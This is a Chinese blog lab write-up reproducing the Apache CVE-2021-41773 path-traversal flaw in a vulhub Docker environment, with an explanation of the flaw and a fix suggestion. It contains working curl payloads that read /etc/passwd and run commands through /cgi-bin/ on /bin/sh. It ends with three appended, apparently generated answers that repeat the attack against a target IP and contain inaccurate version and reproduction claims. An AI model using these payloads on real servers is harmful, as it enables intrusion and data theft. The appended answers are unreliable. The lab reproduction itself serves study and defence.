CVE-2021-41773漏洞复现

1.安装debian系统

首先我选择的系统是debian10版本,也可以在别的系统完成复现,我想一个纯净版,所有重新安装了一个系统,安装步骤简单展示一下。

1.创建虚拟机,点击下一步。

导入镜像

自己选安装的位置以及虚拟机的名称。

安装过程需要设置管理员密码和新建一个用户,自己设置一下就可以了

这里选择了第二个。

 因为之前我们选择了lvm,那么这里选择是就可以了

因为我们需要一个简单系统,所有只选择了下面三个安装软件

中间少的部分就是一直点击继续就可以了,最后安装好了。

 2.下载靶场,首先找到虚拟终端,打开终端。

2.下载靶场、docker以及docker-compose

 首先需要安装git命令,这样我们利用git命令下载靶场

 下载好git,输入命令下载靶场,靶场地址https://github.com/vulhub/vulhub 如果和下面一样出现错误,就将命令https换成git就可以啦。

 下载完成以后,可以自己查看一下。

 接下来安装docker和docker-compose

 

 下载完成以后可以进入CVE-2021-41773查看readme.zh-cn.md 查看中午,里面会有该漏洞的提示和一些playload.

3.漏洞复现

 现在我们输入命令开始启动环境。

 环境启动以后,我们按照提示访问自己的IP地址8080端口,这个时候我们需要查看自己的ip地址,会发现ifconfig不行,需要输入apt install net-tools 安装工具,这样就可以使用ifconfig

 得到ip地址可以在本机浏览器访问http://ip:8080,看到it's work,就代表可以了

 现在我们就可以构造playload ,记得回到根目录执行代码

 可以看到成功读取了passwd文件内容。也可以读取adduser.conf,其他文件需要自己试试了。

 在服务端开启了cgi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执行任意命令:

```
curl -v --data "echo;id" 'http://your-ip:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'
```

4.漏洞的条件

穿越的目录允许被访问,比如配置了`<Directory />Require all granted</Directory>`。(默认情况下是不允许的)

后面我有写检测该漏洞的检测脚本,感兴趣可以去看看

CVE-2021-41773、CVE-2021-42013检测脚本_dreamthe的博客-CSDN博客

5.漏洞产生的原理

Apache HTTP Server 2.4.49版本使用的ap_normalize_path函数在对路径参数进行规范化时会先进行url解码,然后判断是否存在../的路径穿越符

当检测到路径中存在%字符时,如果紧跟的2个字符是十六进制字符,就会进行url解码,将其转换成标准字符,如%2e通过url解码之后是一个点(.)对于路径的url解码之后再来判断是否存在../。

如果路径中存在%2e./形式,就会检测到,因为遍历第一个字符是%紧跟2个字符是十六进制那么会被转换成点,这样会和后面的./就会连成../,这样就会被拦截。但是出现.%2e/这种形式时,在遍历到第一个.字符时,此时检测到后面的两个字符是%2,那么就构造不成../而是.%2,就不会把它当作路径穿越符处理,也就是说在检测是否有路径穿越符之后,%2e再解码变成了点,最终.%2e/解码成了../。因此可以使用.%2e/或者%2e%2e绕过对路径穿越符的检测。

参考文章:【安全漏洞】CVE-2021-41773和CVE-2021-42013漏洞分析 - 简书(里面有详细过程,大家可以参考)

6.修复建议

增加ap_normalize_path函数的判断条件,对于.%2e或者%2e%2e进行判断,避免绕过

下一篇:CSRF漏洞原理与防御方式_dreamthe的博客-CSDN博客


 

### 回答1: cve-2021-41773漏洞是Apache HTTP Server中的一个安全漏洞,攻击者可以利用该漏洞在未经授权的情况下访问服务器上的文件。 要复现漏洞,可以按照以下步骤进行: 1. 安装Apache HTTP Server,并确保其版本为2.4.49或更早版本。 2. 创建一个名为“test”的目录,并在其中创建一个名为“test.txt”的文件。 3. 启动Apache HTTP Server,并访问以下URL:http://localhost/test/.%2e/%2e%2e/%2e%2e/%2e%2e/test.txt 4. 如果服务器返回“HTTP/1.1 200 OK”响应,则表示漏洞存在,攻击者可以访问服务器上的任何文件。 需要注意的是,该漏洞只影响Apache HTTP Server 2.4.49及更早版本,如果您使用的是更新版本的Apache HTTP Server,则不受此漏洞的影响。同时,为了保护服务器的安全,建议及时更新Apache HTTP Server的版本。 ### 回答2: cve-2021-41773漏洞是一种存在于Apache HTTP Server 2.4.49以前版本的目录遍历漏洞,攻击者可以通过构造恶意的GET请求来访问并读取目标服务器上没有授权读取权限的文件,例如 /usr/local/apache/logs/error.log。 这个漏洞复现非常简单,只需要使用curl或者其他工具向目标服务器发起恶意的GET请求,即可获取目标服务器上的敏感信息。 首先需要确定目标服务器上是否安装了Apache HTTP Server,并且确认目标服务器的版本是否在2.4.49以前。可以使用nmap等端口扫描工具扫描目标服务器上是否开放了HTTP服务,并尝试访问目标服务器上的默认页面,确认是否安装了Apache HTTP Server。 如果确定目标服务器上存在Apache HTTP Server,并且版本较低,则可以使用curl等工具向目标服务器发起以下恶意请求: curl -v http://<target_ip>/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd 其中,<target_ip>需要替换为目标服务器的IP地址,上述请求会尝试访问目标服务器上的/etc/passwd文件。如果能够获取到文件内容,则说明漏洞复现成功。 防范这个漏洞,首先需要及时升级Apache HTTP Server的版本,避免漏洞被攻击者利用。其次,可以使用Web应用程序防火墙(WAF)等安全工具来阻止滥用漏洞的请求,减少漏洞被攻击的风险。最后,建议对服务器配置进行加固,避免敏感文件被访问。 ### 回答3: cve-2021-41773漏洞是一个Apache HTTP Server的安全漏洞,可通过发送特制的HTTP请求来导致服务器上已经存在的目录结构泄露。该漏洞可能会公开网站上存在的私人和敏感信息,并为攻击者进一步攻击网站提供有关目标的有用信息。此漏洞的影响范围很广,可能影响许多版本的Apache HTTP Server。 要复现这个漏洞,我们需要在本地搭建一台Apache HTTP Server并设置虚拟主机。 在此之前,我们需要确保已经安装了Apache HTTP Server,如果没有安装Apache HTTP Server,可以通过以下命令在Ubuntu上安装: sudo apt-get update sudo apt-get install apache2 安装完成后,我们需要设置虚拟主机。在此例中,我们将使用名为example.com的虚拟主机。我们可以通过以下步骤进行设置: 1. 创建一个名为example.com的目录: sudo mkdir /var/www/example.com 2. 将权限设置为Apache用户: sudo chown -R www-data:www-data /var/www/example.com 3. 在我们刚创建的目录中创建一个名为index.html的文件: sudo nano /var/www/example.com/index.html 输入一些HTML代码,例如“ Hi there!” 保存并关闭文件。 4.创建一个apache虚拟主机配置文件: sudo nano /etc/apache2/sites-available/example.com.conf 在配置文件中添加以下行,以配置虚拟主机: <VirtualHost *:80> ServerAdmin webmaster@example.com DocumentRoot /var/www/example.com ServerName example.com ServerAlias www.example.com <Directory /var/www/example.com> Options Indexes FollowSymLinks AllowOverride All Require all granted </Directory> ErrorLog ${APACHE_LOG_DIR}/error.log CustomLog ${APACHE_LOG_DIR}/access.log combined </VirtualHost> 保存并关闭文件。 5. 禁用默认虚拟主机: sudo a2dissite 000-default.conf 6. 启用新虚拟主机: sudo a2ensite example.com.conf 7. 配置Apache HTTP Server: sudo service apache2 reload 现在我们已经设置了虚拟主机,我们可以开始测试漏洞。我们可以使用curl发送一个特制的HTTP请求来尝试获取服务器上的文件和目录结构。如下所示: curl -v http://example.com/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd 上面的请求意味着我们正在请求服务器上的“/etc/passwd”文件,这是一个包含用户的帐号信息的文件。执行上面命令后,我们将看到类似以下内容的响应: ... < HTTP/1.1 200 OK < Accept-Ranges: bytes < Content-Length: 266 < Connection: close < Content-Type: text/plain ... root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin ... ... 在上面的响应中我们可以看到给出的是服务器上的用户的帐户信息,这表明我们已经成功地利用了漏洞获取了服务器上的敏感信息。 攻击者可以进一步利用此信息对系统进行攻击。此外,在通过Apache HTTP Server公开网站的时候,最好配置适当的安全策略以确保保证系统的安全性。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值